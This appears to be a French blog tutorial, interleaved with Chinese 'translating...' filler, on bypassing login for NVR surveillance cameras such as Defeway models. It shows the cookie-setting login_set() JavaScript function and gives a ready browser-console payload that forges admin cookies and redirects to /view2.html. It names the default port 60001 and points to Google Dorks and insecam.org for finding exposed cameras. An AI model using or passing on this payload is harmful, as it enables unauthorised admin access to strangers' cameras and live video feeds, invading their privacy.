Camera NVR « Network Video Client » : Bypass authentication

内容

Comme le titre l’indique, certains modèles de camera de surveillance sont accéssible (accès admin) sans mot-de-passe.

正在翻译...

Les modeles vulnerables sont multiples. On peut citer la marque Defeway par exemple. La faille provient du systeme embarqué, plus précisement du serveur web et de son système d’authentification.

正在翻译...

Ces cameras sont reconaissables grâce à leur interface web qui ressemble à ceci:

正在翻译...

NVR camera viceo client web interface connexion

正在翻译...

Pour information, le port par defaut est le 60001.

正在翻译...

Pour accèder à l’interface admin il suffit de faire appel à une fonction javascript: login_set() qui se trouve dans /js/cookie.js;

正在翻译...

Voici son code:

正在翻译...

function login_set(usr,pwd,iSetAble,iPlayBack){ pwd = !pwd ? 'null' : pwd; Cookies.set("dvr_usr", usr); Cookies.set("dvr_pwd", pwd); Cookies.set("iSetAble", iSetAble); Cookies.set("iPlayBack", iPlayBack); }

正在翻译...

Vous l’aurez remarqué, la fonction n’est pas chargée de vérifier les données. Elle ne fait qu’ecrire les 4 cookies avec les données qu’on lui fournie.

正在翻译...

Parmis ces données:

正在翻译...
  • dvr_usr: nom d’utilisateur: « admin » par defaut mais une autre valeur fonctionne également.
  • dvr_pwd: Mot-de-passe comletement fictife on s’en fout
  • iSetAble: 1 pour admin
  • iPlayBack: 1 Pour pouvoir visionner les flux videos
正在翻译...

Une fois sur la page d’authentification, on ouvre la console de developpement ou javascript (F12 sur la plupart des navigateur). Puis on insere le code suivant:

正在翻译...

login_set('admin','pawned',1,1);document.location="/view2.html";

正在翻译...

La premiere ligne cree les cookies d’authentification, la deuxiemme vous redirige vers la page d’admin. pour la premiere ligne on aurait pu faire ceci également :

正在翻译...

login_set(1,1,1,1);

正在翻译...

puis taper dans la barre d’adresse : http://ip_cible:port/view2.html

正在翻译...

Execution du script d’authentification…

正在翻译...

Affichage de la page d’admin une fois fait…

正在翻译...

Vous pouvez trouver ces cameras via les « Google Dorks » ou tout simplement via insecam.org

正在翻译...